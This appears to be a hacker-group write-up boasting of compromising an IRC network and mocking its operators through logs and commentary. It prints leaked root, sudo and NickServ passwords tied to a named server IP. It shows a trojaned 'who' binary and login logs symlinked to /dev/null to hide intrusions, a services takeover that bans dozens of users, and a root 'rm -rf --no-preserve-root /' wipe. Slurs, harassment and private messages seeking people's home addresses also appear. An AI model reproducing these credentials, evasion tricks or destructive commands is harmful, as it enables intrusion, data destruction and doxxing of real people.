+█ were u talking to 'MLT' on here in the past few days? +█ which i highly doubt +█ because its been them +█ the entire time +█ this is a classic case of SE +█ and good organization +█ and planning +█ i haven't been on since Wednesday or thursday +█ too bad theres no real skills behind them +█ <&FuZi0N> bongrip: but when i did .pwn mlt how were they still able to acces +█ s dank? +█ they could do real damage +█ this is a classic case of double face palm time +█ they werent +█ it was already done +█ and u probably didnt have access +█ if htey know how to use the box +█ bot* +█ yea tbh this is the first time anything of mine has ever been 'owned' +█ lol +█ they probably deleted my entire !user list +█ and !nig list +█ fuzi0n u probably dont even have access anymore +█ time 2 retire dank :) +█ i have to check and see what all theyve done +█ nah +█ dank is good +█ its time for u nigs to +█ <&FuZi0N> well i did the pwn cmd and the bot was banned but they just rejoin +█ ed and started glining.... +█ secure ur pw's +█ then run it without an oline +█ I still don't understand how they could obtain my nickserv pass +█ after i changed it this morning +█ ya ill run it w/out an oline +█ doesnt need one +█ thatll end everything +█ <&FuZi0N> i think the box is popped +█ no more anything +█ no its not +█ lol +█ lur an idoit +█ no box is popped +█ <&FuZi0N> but then explain +█ listen ill break it down to u +█ listen +█ listen +█ slitsen +█ ok +█ these are the same guys +█ rofl +█ HERE IT COMES +█ that did the .priv9 shit +█ from urban dictionary +█ sthe sendraw +█ they still had mlt's password +█ oh yea its definitely him +█ lol +█ fromn when all that shit happened +█ they held onto it +█ to do this again +█ today +█ they held it that long... +█ when they couldh ave owned +█ they've been on here for days +█ shit +█ were u speaking to 'MLT' past 3 days// +█ yea but nmothing was leaked +█ no +█ i wasnt +█ trust nothing was leaked +█ ah +█ im telling u +█ they had ur password +█ from last time +█ shit happened +█ <&FuZi0N> does mlt have oper or only oper via dank? +█ he has oper +█ so they would have used oper +█ <&FuZi0N> ahh ok +█ to own us +█ instead of dank +█ i have oper but not via dank +█ if htey knew what they were doing +█ and they don't have my oper pass +█ ya +█ just his nickserv pw +█ they saved from the last skidmarks they put on the server +█ yeah but +█ i changed my ns pass +█ today +█ then this happens later today +█ <&FuZi0N> Selling nickserv passwords for btc. PM bongrip for prices! +█ <&FuZi0N> we can have another revenue stream guys +█ what were u using +█ what client mlt +█ hoping not irccloud +█ that shit is owned +█ most webirc's are +█ lol, have been using irccloud +█ ill start using irssi again +█ you havent heard about irccloud? +█ um not other than some lame IP leak method +█ digerati got his ass raped +█ i fucked with a lot of people too for years +█ until they publicly started showing that irccloud was owned +█ like nubs +█ ruined fun for everyone +█ tbh +█ <&bongrip> MLT +█ <&bongrip> oh theres more than just ip leak +█ <&bongrip> but anywho +█ <&bongrip> thats just the low hanging fruit +█ <&bongrip> no irccloud +█ <&bongrip> the leeter people actually have real access +█ <&bongrip> but dont say shit about it +█ Bongrip, do you have jabber? +█ um +█ I'm trying to change my ns pass +█ then after i do //ns set it tells me to re-identify +█ and its not working w/ the pass i just changed it to +█ lol +█ -!- mode/#insecurity [-r] by ChanServ +█ <&bongrip> re-register +█ <&bongrip> ur account was fucked with +█ <&bongrip> they logged in so +█ <&bongrip> chances are they fucked with settings +█ <&bongrip> :\ +█ <&bongrip> id still wanna know their method of obtaining the pw +█ <&bongrip> it had to have been nickserv but like +█ <&bongrip> u said u changed it +█ yeah i changed it early today +█ like 12 hours ago +█ then they had it again by the time i come back online.. +█ <&bongrip> they dont have any other passwords +█ <&bongrip> otherwise more damage would have been done +█ so does that mean I'm pwned @ client-side +█ or wut +█ lol +█ <&bongrip> nah ill wait till the real mlt comes on +█ <&bongrip> oh wait nvm +█ <&bongrip> rofl +█ <&bongrip> cause opered +█ <&bongrip> unless +█ <&bongrip> theres a leak on that end of the server owners hand +█ nah lol they don't have oper +█ only me got oper +█ i just dunno how they could repeatedly get a nickserv pass like that +█ w/o anope 0day or smth +█ <&bongrip> nah +█ keylogger :) +█ <&bongrip> im tellin u +█ <&bongrip> theres something on ur end +█ <&bongrip> lol +█ <&bongrip> especially if u changed pw's +█ <&bongrip> my box is not compromised +█ <&bongrip> i just checked it out +█ <&bongrip> i know syn4pse's is secure' we're good +█ <&bongrip> idk man +█ <&bongrip> the main point is +█ <&bongrip> if you have to ask if you're owned +█ <&bongrip> just assume it to be +█ yeah I'm gonna wipe my os +█ and install Linux tomorrow +█ i can only assume ive been hit w/ something @ client-side +█ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ +█ 21:09 <~bongrip> MLT +█ 21:09 <~bongrip> the mammoth has been poked <- Вот дерьмо +█ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ +█ <+ghost> MLT: did you finish installing Linux? +█ <~MLT> didnt start yet +█ <+ghost> ok just let us know the uname -a when you're done so we can tailor +█ the payload for the next link we send you +█ <~syn4pse> lol +█ <~bongrip> ghost +█ <~bongrip> come at me little pup +█ <~bongrip> who r u bb +█ <+ghost> nobody cares about your shitty irc bot +█ <~bongrip> what type of payload are we talking sweetherat +█ <~bongrip> yea bro thats a hobby dont limit me to what i say +█ <~bongrip> please dont doubt shit son +█ <~bongrip> rofl +█ <+ghost> why do you think we sent .raw, we could do it if we actually wanted +█ access +█ <~bongrip> no +█ <~bongrip> you couldnt rofl +█ <+ghost> you have said enough in that respect +█ <~bongrip> you didnt +█ <~bongrip> you didnt know what to do +█ <~bongrip> you dont have the first clue as to what you should have put in +█ <~bongrip> tell me +█ <~bongrip> give me the cmd +█ <~MLT> do u not have some antifa demonstrations to be attending +█ <~MLT> or furry meetups +█ <~bongrip> .!raw what +█ <~bongrip> show me +█ <~bongrip> rn +█ <~bongrip> mr hacker +█ <~syn4pse> ^^ +█ <~bongrip> ill paste it correctly after you fuck it up +█ <~bongrip> noob +█ <~MLT> <+ghost> ok just let us know the uname -a when you're done so we can +█ tailor the payload for the next link we send you +█ <~MLT> >>>>> impyling you have grsec bypass +█ <~MLT> lol +█ <+ghost> how about !raw run cmd.exe deltree C:\ # fuq1ng wind0ws +█ <~bongrip> that wont work bb +█ <~bongrip> i can actually run that for you rn +█ <~bongrip> and dank wont move a muscle +█ <~bongrip> youll see the reply +█ <~bongrip> want me to tell you why? +█ * syn4pse waits for dank to quit +█ <~bongrip> you're a dumbfuck? +█ <~bongrip> lol +█ <+ghost> i don't because we never wanted some garbage RDP to begin with +█ <~bongrip> you could have actually done something +█ <~MLT> you wanted access to our ircd +█ <+ghost> what would we gain? +█ <+ghost> your MIRC license? +█ <~MLT> which u failed to obtain +█ <~bongrip> the keys to this entire kingdom +█ <~bongrip> all the ip's +█ <~bongrip> pop shit +█ <~bongrip> ddos us +█ <~bongrip> make us dump +█ <~bongrip> pop tcpdump +█ <~bongrip> snort +█ <~bongrip> do some thing +█ <~bongrip> pop sshd +█ <~bongrip> be smart +█ <~bongrip> not a dumb fag +█ <@Southern_B|tch> 0.o +█ <~bongrip> dont come back here after you make mistakes +█ <+ghost> ip addresses? like the ones you were logging in #priv8, an open cha +█ nnel that was not even +s? +█ <~bongrip> and say 'oh we still got you haha' +█ <~bongrip> tell me what my ip is to my hub +█ <+ghost> you think we don't know the hub ip? +█ <~bongrip> what is it +█ <~syn4pse> no +█ <+ghost> what server am i connected to? +█ <~syn4pse> dont tell it i dont want to have to change it +█ <+ghost> tell me, bongrip +█ <~bongrip> lol at least you got some info passed down to u +█ <~bongrip> thats good +█ <~bongrip> same pw i had since el8 +█ <~bongrip> err +█ <~bongrip> domain* +█ <~bongrip> only gave one person that, p funny +█ <~bongrip> but that person proved to open their mouth about a bunch of thing +█ s +█ <~bongrip> which im gonna end up dropping info too, and im pretty sure peopl +█ e won't like it including you +█ <+ghost> which password? +█ <+ghost> the one you sent us yesterday? +█ <~MLT> rofl told u +█ <~MLT> @ bongrip +█ <~MLT> who's "us" +█ <~MLT> would that be zf0?? +█ <~MLT> professional blackhat hacker extraordinaires +█ <+ghost> IDENTIFY fuckyehbr0 +█ bongrip [rip@undernix.net] has quit [NickServ (GHOST command used by scope)] +█ bongrip [rip@A5CC1D30:CAE4151D:95D19DA1:IP] has joined #insecurity +█ * mode/#insecurity [+v bongrip] by danK +█ <~MLT> lol +█ <+scope> <3 +█ <@Southern_B|tch> Oh +█ <~MLT> lmao +█ <+ghost> looks like he still hasn't changed it either, i didn't expect that +█ <~MLT> where the oper passes at? +█ <+bongrip> lol +█ <+bongrip> nice try +█ <+bongrip> i used msg nickserv too :P +█ <+bongrip> just dug that out of logs did you +█ <+bongrip> acting like a hacker again? +█ <~MLT> I don't even know my nickserv pass atm so id be surprised if +█ they knew it +█ <@Southern_B|tch> We suppose to remember them? +█ * scope [deploy@53ECE845.87245059.98A7DFBF.IP] has quit [Z:lined (lol i knew +█ ur dumbass was a part of it, slut i know who u are so will everyone else +█ soon)] +█ <~MLT> were they even part of it tho +█ <@Southern_B|tch> 0.o +█ <~MLT> like tbh i was about to /ns ghost u there +█ <~MLT> just to see if it worked +█ <~MLT> lol +█ <+bongrip> well +█ <+bongrip> could be +█ <+bongrip> either way +█ <+bongrip> lol +█ <+bongrip> fuck them for trying +█ <~MLT> we need to stop banning like EVERYONE tho lol +█ <@Southern_B|tch> I think they just tried it +█ <+bongrip> right? +█ <~MLT> i guess +█ <~MLT> lol +█ <~MLT> but +█ <+bongrip> illremove it +█ <~MLT> i would have done the same +█ <+bongrip> i did it for fun tho +█ <~MLT> obv someone was gonna try +█ <+bongrip> ya +█ <+bongrip> tru +█ <+bongrip> but i would expect a ban +█ <+bongrip> and release +█ <+bongrip> just the same +█ <~MLT> so did u message ""nickserv"" too/ +█ <~MLT> lol +█ <@Southern_B|tch> Banning is p lame +█ <~MLT> agree +█ <+bongrip> ya +█ <+bongrip> perm bans are +█ <~MLT> unless like cp +█ <+bongrip> second bans arent +█ <~MLT> or something +█ <+bongrip> lol +█ <@Southern_B|tch> Why ban people who keep room going +█ <@Southern_B|tch> xD +█ <+bongrip> making me drop my nick cause this ghost fag likes to save pw's fr +█ om when i was gone for 2 days and ircd restarted +█ <+bongrip> theres no hack in that +█ <+ghost> i agree too +█ <+bongrip> lol +█ <@Southern_B|tch> Wb +█ <+bongrip> what else u got buddy +█ <+ghost> why don't you stop being l4m3r +█ <+bongrip> anything +█ <~MLT> >>typing in leetspeak because I'm a hacker +█ <~MLT> where are our oper passes?? +█ <~MLT> im srsly disappointed +█ <~MLT> in u +█ <~MLT> right now +█ <+bongrip> ghost +█ <@Southern_B|tch> Oh +█ <+bongrip> where are we penetrated +█ <@Southern_B|tch> Scrolling +█ <+bongrip> ive looked high and low +█ * ghost [ghost@15808AD9.9D59F381.148B5546.IP] has quit [Quit: keep guessing] +█ <@Southern_B|tch> He left +█ <+bongrip> lol +█ <&sniger> Lmao +█ <+dirty> bongrip, inb4 the mail server +█ <&sniger> Hax af +█ <+bongrip> i was jk +█ <~MLT> nothing is owned +█ <~MLT> lol +█ +█ <+bongrip> ive looked high and low +█ +█ He says he keeps eye on servers and knowing they are secure. +█ We check too. +█ +█ root@zyzz8:~# cat .bash_history +█ su (09:06:40) (~chrono_) (23: Result 1: 164.132.228.206 (irc.supernets.org) +█ <<< (23: Result 1: 164.132.228.206 (irc.supernets.org) <<< (23: Result 1: 16 +█ 4.132.228.206 (irc.supernets.org) <<< (23: Result 1: 164.132.228.206 (irc.su +█ pernets.org) <<< (23: Result 1: 164.132.228.206 (irc.supernets.org) <<< (23: +█ Result 1: 164.132.228.20605:-58) 05:-58) 05:-58) 05:-58) 05:-58) 05:-58) +█ (09:06:41) (~chrono_) (irc.supernets.org) <<< (23: Result 1: 164.132.228.206 +█ (irc.supernets.org) <<< (23: Result 1: 164.132.228.206 (irc.supernets.org) < +█ << (23: Result 1: 164.132.228.206 (irc.supernets.org) <<< (23: Result 1: 164 +█ .132.228.206 (irc.supernets.org) <<< (23: Result 1: 164.132.228.206 (irc.sup +█ ernets.org) <<< (23: Result 1:05:-58) 05:-58) 05:-58) 05:-58) 05:-58) 05:-58 +█ ) +█ who +█ whoami +█ ls +█ ls -lah +█ cd /home/ +█ ls +█ ps aux +█ apt-get install build-essential +█ apt-get install upgrade +█ apt-get install update +█ apt-get install update +█ apt-get install upgrade +█ apt-get update +█ apt-get upgrade +█ apt-get install build-essential +█ apt-get install libssl-dev +█ apt-get install fail2ban +█ apt-get install psad +█ adduser ins3circd +█ nano /etc/sudoers +█ apt-get install nano +█ apt-get install sudo +█ nano /etc/sudoers +█ su ins3circd +█ su ins3circd +█ su ins3circd +█ cd /home/ins3circd +█ ls +█ ls -lah +█ rm -rf .bashrc +█ cp .bashrc2 .bashrc +█ su ins3circd +█ su ins3circd +█ su ins3circd +█ su ins3circd +█ ls +█ who +█ ls -lah +█ cd /home/ +█ ls +█ cd ins3circd +█ ls +█ ps aux +█ netstat -an +█ who +█ ps aux +█ kill -9 22694 +█ su ins3circd +█ cd ins3circd +█ cd /home/ +█ cd ins3circd/ +█ nano unrealircd.conf +█ cd Unreal* +█ sudo nano unrealircd.conf +█ ./unreal rehash +█ cat /etc/shadow +█ cd /var/ +█ ls +█ cd log +█ ls +█ cat messages +█ cat faillog +█ cat syslog +█ ls -lah +█ cd ~ +█ ls +█ ls -lah +█ cat .bash_history +█ apt-get update +█ apt-get upgrade +█ cd /home/ins3circd/ +█ nano unrealircd.conf +█ cd Unreal* +█ sudo nano unrealircd.conf +█ ./unreal rehash +█ exit +█ su ins3circd +█ exit +█ cd /home/ins3circd +█ cd Unreal* +█ sudo nano unrealircd.conf +█ ./unreal rehash +█ cd /home/ins3circd/Unreal3.2.10.1/ +█ sudo nano unrealircd.conf +█ ./unreal rehash +█ sudo nano unrealircd.conf +█ ./unreal rehash +█ +█ Lazy strategy: replace /usr/bin/who and log in at different times +█ +█ root@zyzz8:~# cat /usr/bin/who +█ #!/bin/bash +█ echo -e "$USER\t`tty|sed s/'\/dev\/'//`\t`date +'%F %H:%M'`\t`echo $SSH_CLIE +█ NT | awk '{ print $1}'`" +█ root@zyzz8:~# ls -al /var/log/[wb]tmp +█ lrwxrwxrwx 1 root root 9 May 27 19:20 /var/log/btmp -> /dev/null +█ lrwxrwxrwx 1 root root 9 May 27 08:07 /var/log/wtmp -> /dev/null +█ root@zyzz8:~# ls -al /var/log/lastlog +█ lrwxrwxrwx 1 root root 9 May 27 19:22 /var/log/lastlog -> /dev/null +█ +█ Results: Is super effective, bongrip ran ls in /var/ and did not notice the +█ symlinks to /dev/null xaxaxaxaxaxa +█ +█ : APt SUCC3SS : +█ +█ +███████████████████████████████████████████████████████████████████████████████ +███▓▓▓▒▒▒░░░ 0x06 MD5pedia ███ +███████████████████████████████████████████████████████████████████████████████ +█░░ +█░ +█░ We finding another vuln in dank with wiki module. Western children may be +█ surprised, but anyone can edit Wikipedia entries. So we did. +█ +█ Sadly they removing dank commands after this. We guessing they tired of +█ "not getting hacked" over and over again. Goodbye, товарищ. +█ +█ RIP [zf0]danK +█ 2014 - 2017 +█ +█ GZLINE MLT 0 :by3 +█ GZLINE bongrip 0 :w3 ruN th1s n0w +█ bongrip has quit (Z:lined (w3 ruN th1s n0w)) +█ GZLINE syn4pse 0 :srry h4v3 2 +█ syn4pse- has quit (Z:lined (srry h4v3 2)) +█ catsik has quit (Z:lined (surprise)) +█ syn4pse has quit (Z:lined (srry h4v3 2)) +█ loeken has quit (Z:lined (srry h4v3 2)) +█ GZLINE RMS 0 :surprise +█ RMS has quit (Z:lined (surprise)) +█ GZLINE lola 0 :surprise +█ lola has quit (Z:lined (surprise)) +█ GZLINE loeken 0 :surprise +█ GZLINE sxcurity 0 :w3 l0v3 y0u th0ugh +█ Zodiac has quit (Z:lined (w3 l0v3 y0u th0ugh)) +█ sxcurity has quit (Z:lined (w3 l0v3 y0u th0ugh)) +█ dab has quit (Z:lined (w3 l0v3 y0u th0ugh)) +█ GZLINE FuZi0N 0 :surprise +█ FuZi0N has quit (Z:lined (surprise)) +█ skooch has quit (Z:lined (surprise)) +█ GZLINE Alyssa 0 :surprise +█ Alyssa has quit (Z:lined (surprise)) +█ GZLINE komodo 0 :surprise +█ PRIVMSG ChanServ :AKICK #noc ADD MLT /dev/null +█ PRIVMSG ChanServ :AKICK #noc ADD *@* /dev/null +█ PRIVMSG OperServ :SAJOIN swerve #research +█ PRIVMSG ChanServ :MODE #insecurity LOCK ADD -QC +█ SAJOIN swerve #research +█ SAMODE #research +aqo swerve swerve swerve +█ PRIVMSG ChanServ :ACCESS #insecurity ADD swerve SOP +█ PRIVMSG ChanServ :ACCESS #research ADD swerve SOP +█ PRIVMSG HostServ :SET Derp underunix.net +█ PRIVMSG HostServ :SET swerve underunix.net +█ GLOBAL T1m3 to rM s0m3 sk1ds, n3tw0rk m41nt3n4nc3 +█ PRIVMSG OperServ :SET SUPERADMIN ON +█ PRIVMSG OperServ :SEEN CLEAR +█ PRIVMSG OperServ :SEEN CLEAR 6w +█ PRIVMSG OperServ :FORBID ADD MLT :skid lord +█ PRIVMSG OperServ :OPERNEWS ADD WE GOT HACKED AGAIN +█ PRIVMSG OperServ :GLOBAL g3t r34dy 4 th4 w33klY n3tw0rk m41nt3n4nc3 b1tch3z +█ TOPIC #insecurity :PSA b0ngr1p 1z 1mmun3 t0 b31ng h4qd +█ danK has changed the topic to: PSA b0ngr1p 1z 1mmun3 t0 b31ng h4qd +█ PRIVMSG Global :GLOBAL g3t r34dy 4 th4 w33klY n3tw0rk m41nt3n4nc3 b1tch3z +█ MODE #insecurity +aqo swerve swerve swerve +█ danK sets mode +aqo on #insecurity swerve +█ SAMODE #insecurity +aqo swerve swerve swerve +█ TOPIC #research :d1d y0u m1ss uS? +█ GZLINE YogSotho 0 :n0 r3funDz 3vr +█ YogSotho has quit (Z:lined (n0 r3funDz 3vr)) +█ GZLINE dab 0 :pce +█ PRIVMSG ChanServ :AKICK #insecurity ADD MLT :w3lc0m3 b4q +█ PRIVMSG ChanServ :AKICK #insecurity ADD bongrip :w3lc0m3 b4q +█ PRIVMSG ChanServ :DROP #research #research +█ PRIVMSG ChanServ :DROP #noc #noc +█ GZLINE bongrip 0 :w3 ruN th1z n0w, n3v3r c0m3 b4q +█ PRIVMSG BotServ :BOT ADD MLT ci192 vpn02.fbi.gov :skid lord +█ PRIVMSG OperServ :NOOP SET superb.underunix.net +█ PRIVMSG OperServ :NOOP SET aussie.insecurity.zone +█ PRIVMSG OperServ :NOOP SET fsociety.internetz.me +█ SAMODE #noc -O +█ MODE #noc -O +█ MODE #insecurity +q swerve +█ GZLINE Jaq4l 0 :by3 +█ GZLINE vein 0 :by3 +█ GZLINE buttes 0 :bye +█ GZLINE xamfp 0 :bye +█ GZLINE Southern_B|tch 0 :bye +█ k has quit (superb.undernix.net fsociety.internetz.me) +█ russian has quit (superb.undernix.net fsociety.internetz.me) +█ dezmer has quit (superb.undernix.net fsociety.internetz.me) +█ sniger has quit (superb.undernix.net fsociety.internetz.me) +█ bitn3ss has quit (superb.undernix.net fsociety.internetz.me) +█ kurobeats has quit (superb.undernix.net fsociety.internetz.me) +█ tranny has quit (superb.undernix.net fsociety.internetz.me) +█ h has quit (superb.undernix.net fsociety.internetz.me) +█ FSB has quit (superb.undernix.net fsociety.internetz.me) +█ xamfp has quit (superb.undernix.net fsociety.internetz.me) +█ cSmith has quit (superb.undernix.net fsociety.internetz.me) +█ noproto has quit (superb.undernix.net fsociety.internetz.me) +█ w0ne has quit (superb.undernix.net fsociety.internetz.me) +█ thom has quit (superb.undernix.net fsociety.internetz.me) +█ lilwiz has quit (superb.undernix.net fsociety.internetz.me) +█ eight_bytes has quit (superb.undernix.net fsociety.internetz.me) +█ anniesbbs has quit (superb.undernix.net fsociety.internetz.me) +█ Darkness has quit (superb.undernix.net fsociety.internetz.me) +█ dickbutt has quit (superb.undernix.net fsociety.internetz.me) +█ Southern_B|tch has quit (superb.undernix.net fsociety.internetz.me) +█ Nux has quit (superb.undernix.net fsociety.internetz.me) +█ Jaq4l has quit (superb.undernix.net fsociety.internetz.me) +█ Nux_ has quit (superb.undernix.net fsociety.internetz.me) +█ krazed has quit (superb.undernix.net fsociety.internetz.me) +█ sipa has quit (superb.undernix.net fsociety.internetz.me) +█ integrity has quit (superb.undernix.net fsociety.internetz.me) +█ herpez has quit (superb.undernix.net fsociety.internetz.me) +█ hipphopp has quit (superb.undernix.net fsociety.internetz.me) +█ fr0zn has quit (superb.undernix.net fsociety.internetz.me) +█ ma0u has quit (superb.undernix.net fsociety.internetz.me) +█ psycho has quit (superb.undernix.net fsociety.internetz.me) +█ deeboi has quit (superb.undernix.net fsociety.internetz.me) +█ Conflict has quit (superb.undernix.net fsociety.internetz.me) +█ +█ +███████████████████████████████████████████████████████████████████████████████ +███▓▓▓▒▒▒░░░ 0x07 Clash of the hashes ███ +███████████████████████████████████████████████████████████████████████████████ +█░░ +█░ +█░ We thought we would help American celebrate their independence day with +█ some fireworks. +█ +█ ok guise +█ i know ive been MIA for weeks +█ but im gonna make this IRC active as fuck over the course of the next +█ few days +█ haha wb! +█ first off im gonna be expunging some skiddies from our group +█ but ill get to that l8r :P +█ +█ No, let's get to that now. +█ +█ gb: i am the official root +█ bongrip knowing who i am +█ you mean like that bitch from person of interest? +█ bongrip: is gangster4lyf still being your sudoer password on 139. +█ 99.139.120? and h3ll0p00p6654 your root password? i'm thinking not anymore +█ * bongrip (Z:lined (no reason)) +█ * MLT (Z:lined (no reason)) +█ * syn4pse (Z:lined (no reason)) +█ * syn4pse- (Z:lined (no reason)) +█ * loeken (Z:lined (no reason)) +█ * green (root@undernix.net) has joined #insecurity +█ * mode/#insecurity [+q green] by green +█ * FuZi0N (Z:lined (no reason)) +█ * bongrip_ (Z:lined (no reason)) +█ * sxcurity (Z:lined (no reason)) +█ * Zodiac (Z:lined (no reason)) +█ * dab (Z:lined (no reason)) +█ * mode/#insecurity [+o danK] by spooky_ +█ i came i saw i conquered. fuck being second. i must dominate in +█ every thing i do. +█ * cSmith (Z:lined (no reason)) +█ * Nux (Z:lined (no reason)) +█ MLGBT: and i just came +█ * Darkness (Z:lined (no reason)) +█ * icyphox (Z:lined (no reason)) +█ * h (Z:lined (no reason)]) +█ * dickbutt (Z:lined (no reason)) +█ * mode/#insecurity [+l 47] by danK +█ * lilwiz (Z:lined (no reason)) +█ * thom (Z:lined (no reason)) +█ RIP +█ my message is to hack hard, dont be a sad cunt, enjoy life and dont +█ take urself 2 seriously. +█ * w0ne (Z:lined (no reason)) +█ * RMS (Z:lined (no reason)) +█ * mode/#insecurity [+l 43] by danK +█ * green has changed the topic to: APT +█ * M (3e1fc5bb@boats-16B440C8.mibbit.com) has joined +█ * M has quit (Z:lined (no reason)) +█ * herpez has quit (Z:lined (no reason)) +█ * dopE- has quit (Z:lined (no reason)) +█ * didi_ has quit (Z:lined (no reason)) +█ * smurgle has quit (Z:lined (no reason)) +█ * FlappyCuck has quit (Z:lined (no reason)) +█ * n0rdi has quit (Z:lined (no reason)) +█ * noproto has quit (Z:lined (no reason)) +█ * noproto_ has quit (Z:lined (no reason)) +█ yes hello, i being oper too now +█ * danK sets channel limit to 35 +█ * kla has quit (Z:lined (no reason)) +█ * spooky_ gives channel operator status to spooky_ +█ * installgen2 has quit (Z:lined (no reason)) +█ * psycho has quit (Z:lined (no reason)) +█ * vein has quit (Z:lined (no reason)) +█ * skooch has quit (Z:lined (no reason)) +█ * Alyssa has quit (Z:lined (no reason)) +█ * anniesbbs has quit (Z:lined (no reason)) +█ * M (3e1fc5bb@boats-5AD9868F.mibbit.com) has joined +█ * MLGBT gives channel half-operator status to MLGBT +█ * FSB has quit (Z:lined (no reason)) +█ * rek has quit (Z:lined (no reason)) +█ * M has quit (Z:lined (no reason)) +█ * danK sets channel limit to 26 +█ * MLGBT sets mode +q on #insecurity MLGBT +█ * sipa has quit (Z:lined (no reason)) +█ * tranny has quit (Z:lined (no reason)) +█ * danK sets channel limit to 24 +█ * kurobeats has quit (Z:lined (no reason)) +█ * danK sets channel limit to 23 +█ * jiaolong sets mode +q on #insecurity jiaolong +█ * hipphopp has quit (Z:lined (no reason)) +█ * danK sets channel limit to 22 +█ * Southern_B|tch has quit (Z:lined (no reason)) +█ * Atomic_SA284 has quit (Z:lined (no reason)) +█ * xamfp_ has quit (Z:lined (no reason)) +█ * Jaq4l has quit (Z:lined (no reason)) +█ * krazed has quit (Z:lined (no reason)) +█ * eight_bytes has quit (Z:lined (no reason)) +█ * fatnigger1488 has quit (Z:lined (no reason)) +█ * sniger has quit (Z:lined (no reason)) +█ ChanServ has quit (superb.undernix.net services.undernix.net) +█ +█ !raw timer1 0 1 speak i got rooted +█ result: - duration: 0 ms +█ +█ !raw timer 99999 1 exec calc.exe +█ danK has quit (Connection reset by peer) +█ +█ +█ +█ .''. +█ .''. *''* :_\/_: . +█ :_\/_: . .:.*_\/_* : /\ : .'.:.'. +█ .''.: /\ : _\(/_ ':'* /\ * : '..'. -=:o:=- +█ :_\/_:'.:::. /)\*''* .|.* '.\'/.'_\(/_'.':'.' +█ : /\ : ::::: '*_\/_* | | -= o =- /)\ ' * +█ '..' ':::' * /\ * |'| .'/.\'. '._____ +█ * __*..* | | : |. |' .---"| +█ _* .-' '-. | | .--'| || | _| | +█ .-'| _.| | || '-__ | | | || | +█ |' | |. | || | | | | || | +█ ___| '-' ' "" '-' '-.' '` |____ +█ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +█ +█ ssh ins3circd@139.99.139.120 +█ ins3circd@139.99.139.120's password: +█ +█ Linux zyzz8 4.4.59-1-pve #1 SMP PVE 4.4.59-87 (Tue, 25 Apr 2017 09:01:58 +02 +█ 00) x86_64 +█ +█ The programs included with the Debian GNU/Linux system are free software; +█ the exact distribution terms for each program are described in the +█ individual files in /usr/share/doc/*/copyright. +█ +█ Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent +█ permitted by applicable law. +█ ins3circd@zyzz8:~$ sudo su +█ [sudo] password for ins3circd: +█ root@zyzz8:/home/ins3circd# rm -rf --no-preserve-root / +█ [1] 21641 +█ rm: cannot remove '/run/shm': Device or resource busy +█ rm: cannot remove '/run/lock': Device or resource busy +█ rm: cannot remove '/dev/tty2': Device or resource busy +█ rm: cannot remove '/dev/tty1': Device or resource busy +█ rm: cannot remove '/dev/zero': Device or resource busy +█ rm: cannot remove '/dev/urandom': Device or resource busy +█ rm: cannot remove '/dev/tty': Device or resource busy +█ rm: cannot remove '/dev/random': Device or resource busy +█ rm: cannot remove '/dev/null': Device or resource busy +█ (..) +█ +█ so yeah uh +█ I need oper on this box +█ i also need to speak to lola and ask why the FUCK he wasn't using +█ cert-based auth for ssh +█ +█ +███████████████████████████████████████████████████████████████████████████████ +███▓▓▓▒▒▒░░░ 0x08 Recommended reading ███ +███████████████████████████████████████████████████████████████████████████████ +█░░ +█░ +█░ MLT reassures us MD5 1z CrYpt0grAph1caLLY s3CuR3: +█ +█ @ret2libc: Well, generally its an issue of speed (making GPU cracking +█ highly effective) rather than an issue w/ MD5 being crypto- +█ graphically unsound +█ +█ >>> from hashlib import md5, sha256 +█ >>> md5("4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a\ +█ 3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593d8\ +█ 49676da0d1555d8360fb5f07fea2".decode("hex")).hexdigest() == +█ md5("4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a\ +█ 3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593d8\ +█ 49676da0d1d55d8360fb5f07fea2".decode("hex")).hexdigest() +█ True +█ >>> sha256("4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74\ +█ a3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593\ +█ d849676da0d1555d8360fb5f07fea2".decode("hex")).hexdigest() == +█ sha256("4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74\ +█ a3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593\ +█ d849676da0d1d55d8360fb5f07fea2".decode("hex")).hexdigest() +█ False +█ +█ +█ MLT PRIVMSG sn :yo +█ MLT PRIVMSG sn :lemme know when u around +█ MLT PRIVMSG sn :i need some UK CACI lookups asap +█ MLT PRIVMSG sn :drug deal irl turned sour +█ MLT PRIVMSG sn :so i threatened them now they're turning up at my house w/ +█ a bunch of people +█ MLT PRIVMSG sn :so needing their addresses asap +█ MLT PRIVMSG sn :fuckers stole £1k worth of coke from me +█ MLT PRIVMSG sn :drove away without paying so i was hanging onto his car +█ door punching him in the face while he was speeding up lol +█ +█ bongrip PRIVMSG MLT :we have a mammoth after us +█ bongrip PRIVMSG MLT :someone hired +█ bongrip PRIVMSG MLT :someone bigtime +█ bongrip PRIVMSG MLT :to hack us +█ bongrip PRIVMSG MLT :like someone above el8's head +█ bongrip PRIVMSG MLT :above green +█ bongrip PRIVMSG MLT :etc +█ bongrip PRIVMSG MLT :i dont even know the guys name cause he aliases so +█ much +█ +█ Actually, we taking this job for free. Is a public service. +█ +█ MLT PRIVMSG bongrip :then who +█ bongrip PRIVMSG MLT :positive +█ bongrip PRIVMSG MLT :he said hes better than green +█ bongrip PRIVMSG MLT :and knows assembly and other shit +█ MLT PRIVMSG bongrip :does he have an alias? +█ bongrip PRIVMSG MLT :he has tons of aliases +█ bongrip PRIVMSG MLT :hes a ghost +█ bongrip PRIVMSG MLT :hes just an undergrounder +█ MLT PRIVMSG bongrip :no common or frequent ones? +█ bongrip PRIVMSG MLT :everyone knows who he is +█ bongrip PRIVMSG MLT :but dont really know what to calll him +█ bongrip PRIVMSG MLT :cause hes got a new nick +█ 